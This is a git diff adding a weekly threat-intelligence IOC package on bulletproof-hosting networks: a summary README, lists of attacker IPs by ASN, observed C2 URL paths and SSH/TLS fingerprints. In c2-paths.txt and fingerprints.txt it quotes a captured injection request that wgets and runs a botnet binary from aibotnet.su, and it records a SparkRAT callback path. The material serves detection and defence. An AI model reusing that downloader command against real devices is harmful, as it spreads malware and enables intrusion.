aboutsummaryrefslogtreecommitdiff
path: root/kevlar/2026-07-20/iocs
diff options
context:
space:
mode:
Diffstat (limited to 'kevlar/2026-07-20/iocs')
-rw-r--r--kevlar/2026-07-20/iocs/README.md48
-rw-r--r--kevlar/2026-07-20/iocs/all-observed-ips.txt188
-rw-r--r--kevlar/2026-07-20/iocs/c2-paths.txt41
-rw-r--r--kevlar/2026-07-20/iocs/fingerprints.txt59
4 files changed, 336 insertions, 0 deletions
diff --git a/kevlar/2026-07-20/iocs/README.md b/kevlar/2026-07-20/iocs/README.md
new file mode 100644
index 0000000..bbc987b
--- /dev/null
+++ b/kevlar/2026-07-20/iocs/README.md
@@ -0,0 +1,48 @@
+# Weekly BP Report -- 2026-07-20
+
+Generated: 2026-07-20T11:15:00Z
+ASNs covered: 25 (per bulletproof-asns.csv)
+Query range: 2026-07-13 through 2026-07-20 (7-day window)
+Sponge sessions found: ~6.9M total network traffic across 8 daily buckets
+Active ASNs in Sponge: 17 (7 active+Honeylabs; 10 inactive both sources)
+Honeylabs events found: ~2,600+ across 7 active ASNs
+Censys IPs enriched: 14 IPs (per-host enrichment via censys_get_host)
+Censys credits remaining at start: 10,000
+Anomalies flagged: 11 (3 critical, 5 high, 3 medium)
+
+## Top-Level Findings
+
+1. **AS200651 (FlokiNET)** - Tor exit 185.100.87.136 effserved as a SPARKRAT C2 callback destination (POST /api/client/update) AND Tor exit. OpenSSH upgraded from 10.1 -> 10.2p1. CRITICAL.
+2. **AS216139 (Iron Hosting Centre)** - Sequential port 6001-6050 cluster with uniform 345-348 events each in Censys -- backconnect-C2 listener pattern. CRITICAL.
+3. **AS57043 (Hostkey)** - IoT MIPS downloader (aibotnet.su /bins/kla.sh) from NEW IP 132.243.194.215 (Frankfurt). CRITICAL.
+4. **AS209847** - Not in Census as AS209847; actually tagged belongs to ASICs41745 FORTIS-AS Baykov Ilya Sergeevich (RU, reg 2026-06-06). 998 Sponge sessions single IP 45.144.28.70. CRITICAL.
+5. **AS211720 (Datashield)** - Shifted from /ews/ Exchange recon to MSSQL TDS port 1433 brute (hostname short-tan-rat, self-signed prohaska.beatty.biz cert, TLS 1.0/1.1 still enabled).
+6. **AS51396 (Pfcloud)** - NEW scanner tooling 'odin-scanner/0.4' and 'Hello World' UAs. Cluster IPs rotated to 30/.49/.81/.18 from prior 78/79/80 in 204.76.203.0/24.
+7. **AS14956 (RouterHosting)** - Exposed Werkzeug/3.1.8 'fofa_monitor' Basic-auth panel on port 5000 (HIGH severity Censys misconfig).
+8. **AS400992 (ZhouyiSat)** - Ceased /env scanning this week; censys profile now pure Windows admin (3389/5985/135/445). Behavioral shift.
+
+## Headline Changes vs Prior Week
+
+| Metric | Prior (2026-07-13) | Current (2026-07-20) | Δ | Δ% |
+|---------------------------------|-------------------:|---------------------:|------:|------:|
+| Active ASNs (Sponge or HL) | 15 | 17 | +2 | +13% |
+| ASNs in Censys BULLETPROOF | 11 | 12 | +1 | +9% |
+| Unique HASSH/JA4H signatures | 11 | ~13 | +2 | +18% |
+| Top IP Honeylabs events | 1,518 (AS51852) | 968 (AS200593) | -550 | -36% |
+| Critical anomalies flagged | 2 | 3 | +1 | +50% |
+
+## Directory Structure
+
+- `sponge/` -- Arkime session stats per ASN (33 stat files + 1 timeline)
+- `honeylabs/` -- top-attackers.csv, fingerprints.csv
+- `censys/` -- aggregations-summary.ndjson, fleet-correlation.csv
+- `changes/` -- diff-vs-prior-week.csv, anomalies.csv
+- `iocs/` -- all-observed-ips.txt, fingerprints.txt, c2-paths.txt, README.md (this file)
+
+## Web Access
+
+https://git.sr.ht/~hrbrmstr/gists/tree/main/item/kevlar/2026-07-20/
+
+## Operators Log
+
+See ../OPERATIONS_LOG.md for the full phase-by-phase operations record. \ No newline at end of file
diff --git a/kevlar/2026-07-20/iocs/all-observed-ips.txt b/kevlar/2026-07-20/iocs/all-observed-ips.txt
new file mode 100644
index 0000000..ceca797
--- /dev/null
+++ b/kevlar/2026-07-20/iocs/all-observed-ips.txt
@@ -0,0 +1,188 @@
+# Weekly BP Report -- 2026-07-20
+# All unique IPs observed across all sources, grouped by ASN
+# Query range: 2026-07-13 through 2026-07-20
+
+# AS57043 - Hostkey B.v. (DE/NL)
+132.243.194.215
+191.101.113.207
+194.180.189.50
+82.26.91.137
+
+# AS209847 (BGP-real AS41745) - Baykov Ilya Sergeevich / FORTIS (RU)
+45.144.28.70
+
+# AS210644 - Aeza Group LLC (AT/SE) -- Aeza sees 11 Sponge sessions, 5 IPs
+62.60.231.45
+185.103.101.232
+46.226.162.236
+85.192.24.177
+89.22.229.92
+
+# AS138915 - KAOPU Cloud HK (HK)
+38.54.2.209
+38.54.2.232
+38.54.2.13
+38.54.2.75
+38.54.2.221
+38.54.2.148
+38.54.2.170
+38.54.2.152
+38.54.2.203
+38.54.2.204
+38.54.2.235
+38.54.2.133
+38.54.2.71
+38.54.2.131
+38.54.2.130
+38.54.2.4
+38.54.2.25
+38.54.2.54
+38.54.2.58
+154.205.139.152
+
+# AS14956 - RouterHosting LLC (US)
+216.126.225.6
+172.86.117.15
+172.86.116.32
+104.194.159.11
+104.194.159.137
+172.86.77.209
+216.126.239.17
+172.86.88.130
+172.86.91.170
+172.86.91.215
+107.189.27.179
+172.86.116.42
+172.86.116.99
+172.86.121.247
+172.86.91.220
+172.86.91.224
+172.86.117.54
+144.172.94.110
+104.194.154.210
+144.172.93.32
+216.126.239.17
+144.172.104.239
+172.86.123.136
+144.172.100.9
+144.172.100.114
+216.126.239.72
+107.189.16.6
+45.61.148.157
+45.61.150.163
+167.88.168.121
+
+# AS216139 - Iron Hosting Centre LTD (NL)
+46.30.46.124
+
+# AS51852 - Private Layer INC (CH)
+179.43.134.114
+179.43.175.234
+179.43.175.236
+179.43.139.58
+179.43.133.154
+81.17.28.130
+179.43.186.240
+179.43.168.58
+179.43.189.67
+179.43.170.10
+31.7.63.12
+179.43.185.147
+141.255.165.88
+
+# AS400992 - ZhouyiSat Communications
+23.172.217.77
+185.121.15.184
+193.46.218.82
+23.172.217.87
+45.150.195.235
+
+# AS33993 - UFO-AS (TOV Aktor)
+45.144.31.247
+45.150.64.125
+
+# AS51396 - Pfcloud UG
+204.76.203.18
+176.65.148.84
+45.153.34.89
+45.153.34.149
+45.156.87.216
+45.153.34.114
+45.153.34.165
+45.156.87.13
+45.156.87.254
+45.153.34.151
+45.153.34.167
+45.156.87.93
+45.156.87.253
+45.156.87.178
+45.153.34.235
+45.153.34.112
+45.153.34.161
+45.156.87.147
+45.153.34.181
+45.135.193.193
+176.65.148.25
+204.76.203.81
+204.76.203.49
+176.65.149.30
+176.65.149.212
+176.65.149.27
+176.65.149.31
+204.76.203.30
+176.65.148.144
+176.65.134.3
+176.65.148.2
+176.65.148.184
+45.135.194.10
+176.65.149.67
+176.65.148.250
+176.65.149.64
+176.65.148.29
+176.65.149.220
+176.65.149.230
+
+# AS200651 - FlokiNET ehf (RO/IS)
+185.100.87.136
+185.100.84.174
+185.100.84.164
+37.228.129.67
+
+# AS30823 - aurologic GmbH (DE)
+41.216.188.21
+
+# AS140666 - ANY DIGITAL PTE. LTD. (HK)
+154.94.68.6
+204.3.179.2
+
+# AS198953 - Proton66 OOO (RU)
+176.120.22.16
+176.120.22.61
+176.120.22.123
+176.120.22.122
+37.77.150.241
+37.77.150.67
+193.143.1.66
+176.120.22.192
+37.77.150.83
+37.77.150.70
+176.120.22.240
+176.120.22.147
+
+# AS200593 - Prospero Ooo (TM/RU)
+91.202.233.79
+91.215.85.193
+91.215.85.104
+
+# AS214940 - Kprohost LLC (UA)
+77.83.39.86
+77.83.39.119
+77.83.39.42
+77.83.39.94
+77.83.39.169
+77.83.39.149
+77.83.39.8
+77.83.39.14
+
+# AS211720 - Datashield, Inc. (SC)
+185.231.33.46 \ No newline at end of file
diff --git a/kevlar/2026-07-20/iocs/c2-paths.txt b/kevlar/2026-07-20/iocs/c2-paths.txt
new file mode 100644
index 0000000..f7ef2b6
--- /dev/null
+++ b/kevlar/2026-07-20/iocs/c2-paths.txt
@@ -0,0 +1,41 @@
+# Weekly BP Report -- 2026-07-20
+# Notable HTTP URL paths observed, ordered by detectability/signal value
+# Query range: 2026-07-13 through 2026-07-20
+
+# IoT MIPS downloader (NEW observation - AS57043 Hostkey)
+/shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+kla.sh;./kla.sh
+# Source: 132.243.194.215 (AS57043 Hostkey B.V. DE)
+# JA4H: ge11nn0400_777e992b8532
+# Method: GET on port 6001
+# Intent: Shellshock-style or webshell-triggered IoT botnet MIPS ELF downloader (mirai-variant custom)
+# Indicator: 3 events on 2026-07-16 between 00:21:43 and 03:43:00 UTC
+# References: aibotnet.su domain -- active C2 URL serving /bins/kla.sh MIPS binaries
+
+# SPARKRAT update callback (NEW observation - AS200651 FlokiNET Tor exit)
+/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows
+# Source: 185.100.87.136 (AS200651 PremiumTorExit Tor 0.4.9.11)
+# JA4H: po11nn0600_c9506d37ac14
+# Method: POST with content-type "application/octet-stream" + secret header
+# Intent: SPARK-RAT implant callback confirming Windows 64/amd64 implant update -- commit-style versioning commits to C2 git
+# Indicator: 3 events on 2026-07-13, 5-hour window
+# References: GreyNoise confirms new tag "SparkRAT Client Update Scanner" on this host
+
+# Event Manager RESTful probing (NEW - AS200651 FlokiNET Tor exit)
+/eventmanager
+# Source: 185.100.87.136 (AS200651)
+# JA4H: ge11nn0400_88d30a62b7ad
+# Method: GET /eventmanager HTTP/1.1 on port 443
+# Intent: SPARKRAT manager endpoint observation (subject to validation)
+
+# MSSQL TDS probing 1433 binary handshake (AS211720 Datashield)
+MSSQL TDS Pre-Login binary 0x120100 34 bytes with "MSSQLServer" string and hostname "short-tan-rat"
+# Source: 185.231.33.46 (AS211720) onto honeypot port 1433
+# associated_jarm: 07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823
+# Intent: SQL Server payload inspection / pre-login banner to identify MSSQL version for brute
+# Indicator: 2 events on 2026-07-16 and 2026-07-18
+
+# Pfcloud's 8080/8081 proxy-style port range probing (AS51396)
+GET / HTTP/1.1 on diverse ports 8080, 8081, 8888, 8000, 3128 -- 491 events across one week
+# Source IP rotation: 45.135.193.193 (DE) primary; 45.135.194.10 (DE); 176.65.148.144 (NL); 204.76.203.30 (NL)
+# UA: Go-http-client/1.1 + zgrab/0.x + odin-scanner/0.4 + Hello World
+# Intent: Open proxy discovery -- scanning for proxy ports to abuse for proxy-rotation exfiltration tunnels \ No newline at end of file
diff --git a/kevlar/2026-07-20/iocs/fingerprints.txt b/kevlar/2026-07-20/iocs/fingerprints.txt
new file mode 100644
index 0000000..8b5b84a
--- /dev/null
+++ b/kevlar/2026-07-20/iocs/fingerprints.txt
@@ -0,0 +1,59 @@
+# Weekly BP Report -- 2026-07-20
+# Fingerprints observed per ASN
+# Query range: 2026-07-13 through 2026-07-20
+
+# ============= HASSH Client Fingerprints =============
+
+# AS57043 - Hostkey B.v. - IoT botnet download callback (NO SSH HASSH collected -- HTTP only)
+AS57043,132.243.194.215,ja4h,ge11nn0400_777e992b8532,,IoT MIPS downloader GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh on port 6001
+
+# AS51396 - Pfcloud - dominant scan cluster (no live SSH probed - 204.76.203.18 census HASSH)
+AS51396,204.76.203.18,hassh-server,425d29fe50d8e4f5e37efb6e24bcf660,SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7,Coordinated scan cluster leader; 13,766 Sponge sessions
+AS51396,204.76.203.18,ja4tscan-65160_MTU,42340_2-1-1-4-1-3_1460_10_1-2,,Distinctive MTU 42340 (NOT default Ubuntu 65160) -- custom tuning (smaller MSS)
+
+# AS51852 - Private Layer INC - OpenSSH 8.9p1 Ubuntu-3ubuntu0.15 (same HASSH as AS209847/FORTIS)
+AS51852,81.17.28.130,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.15,PLI-AS new primary IP for week; OpenSSH_8.9p1 with Ubuntu-3 patch level .15 (vs .16 in FORTIS/KPRONET)
+
+# AS200651 - FlokiNet Tor exit - OpenSSH 10.2p1 (UPGRADED from last week's OpenSSH 10.1)
+AS200651,185.100.87.136,hassh-client,e54ef3ec27fe1fea7ab64d3fa05359fd,SSH-2.0-OpenSSH_10.2p1,SSH-10.x series shares HASSH; banner string subtly updated
+AS200651,185.100.87.136,hassh-server,b1bff636ebbdbaa9dd2ad97fd173c956,SSH-2.0-OpenSSH_9.9,Alt-SSH server on port 7288 (not 22)
+AS200651,185.100.87.136,jarm,2ad2ad16d2ad2ad00042d42d000000332dc9cd7d90589195193c8bb05d84fa,,Tor 0.4.9.11 default 9001 listener jarm
+
+# AS400992 - ZhouyiSat - now testing against Windows admin ports (no SSH/TLS fingerprints collected)
+
+# AS14956 - RouterHosting LLC - OpenSSH 9.6p1 Ubuntu-3ubuntu13.18 (NOT vulnerable to regreSSHion) + Werkzeug fofa_monitor panel
+AS14956,216.126.239.17,hassh-server,e42184b06d45385a906f0803d04c83da,SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.18,Patched against regreSSHion
+AS14956,216.126.239.17,fofa-monitor-realm,Basic realm=\"fofa_monitor\",Werkzeug/3.1.8 Python/3.12.3,Censys flagged CENSYS-2022-1002 Unencrypted HTTP Weak Auth on port 5000 -- a fofa-search-style monitoring panel
+
+# AS214940 - Kprohost LLC - OpenSSH 8.9p1 Ubuntu-3ubuntu0.16 (same HASSH as AS209847/FORTIS, AS51852/PLI)
+AS214940,77.83.39.119,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,Uniform Ubuntu 22 LTS provisioning across BP providers
+
+# AS211720 - Datashield - self-signed cert with hostname prohaska.beatty.biz
+AS211720,185.231.33.46,jarm,07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823,,Distinctive TLS 1.0/1.1 still enabled
+AS211720,185.231.33.46,cert-self-signed,"CN=prohaska.beatty.biz; C=US; ST=HI; O=Prohaska-Beatty; OU=compress; emailAddress=compress@prohaska.beatty.biz",Validity 2022-08-16 -> 2029-08-14 (7 years),Static long-lived fake US business entity cert
+
+# AS198953 - Proton66 OOO - GreyNoise suspicious multi-protocol brute
+AS198953,176.120.22.16,greynoise,suspicious,"tags: MySQL Protocol, TLS Crawler, Python requests client, Generic Suspicious Linux Command",Proton66 top IP this week (replaced 176.120.22.240)
+
+# AS209847 ("Sponge tag") / Real AS = AS41745 (FORTIS-AS Baykov Ilya Sergeevich RU)
+AS209847-real-41745,45.144.28.70,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,Same Ubuntu 22 LTS HASSH across multiple bulletproof providers. Known CVEs include CVE-2024-6387 regreSSHion (KEV), CVE-2025-26465, CVE-2023-38408 (KEV), CVE-2026-35385 (HIGH)
+
+# ============= JA4 / JA3 TLS Fingerprints =============
+
+# AS200651 - Stable across prior week (Tor 1.3_d1_d2 client)
+AS200651,185.100.87.136,ja4,t13i1909h2_9dc949149365_97f8aa674fd9,TLSv1.3,Stable TLS 1.3 Chrome-with-Tor-pattern fingerprint
+AS200651,185.100.87.136,ja3,7c1e207beb00684bbbe144f1b0abe1d5,TLSv1.3,Stable
+AS200651,185.100.87.136,ja4h-get,ge11nn0400_88d30a62b7ad,GET /eventmanager HTTP/1.1,GET /eventmanager on port 443 (eventmanager path new this week)
+AS200651,185.100.87.136,ja4h-post-spark,po11nn0600_c9506d37ac14,POST /api/client/update?arch=amd64&commit=08059e95...&os=windows,SPARKRAT callback with octet-stream binary body + secret header
+
+# AS30823 - new entrant with same JA4-base as AS200651 Tor (but different full JA4 due to cipher list composition)
+AS30823,41.216.188.21,ja4,t13i190800_9dc949149365_97f8aa674fd9,TLSv1.3,Same JA4-y-binning base "9dc949149365_97f8aa674fd9" as Tor exit (different i-form 190800 vs 190900 means narrower cipher suite)
+AS30823,41.216.188.21,ja3,19e29534fd49dd27d09234e639c4057e,TLSv1.3,Distinct JA3 RSA-only fingerprint from a benign mobile Android 9 source (Redmi G8141)
+AS30823,41.216.188.21,ja4h,ge11nn0500_9af7e0472034,GET / HTTP/1.1,Android 9 G8141 Chrome 76 mobile UA -- likely benign single connection
+
+# AS51396 - Pfcloud's new scanner fingerprints:
+AS51396,various,ua,Go-http-client/1.1,3 IPs,Go-lang default HTTP client scanner
+AS51396,various,ua,Mozilla/5.0 zgrab/0.x,3 IPs,ZGrab academic scanner
+AS51396,various,ua,odin-scanner/0.4,1 IP (38 events),NEW THIS WEEK -- brand-new custom tooling on Pfcloud farm
+AS51396,various,ua,Hello World,1 IP (12 events),Distinctive minimalistic UA
+AS51396,various,ua,Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36,1 IP (51 events),Chrome 149 spoofing from within Pfcloud infra \ No newline at end of file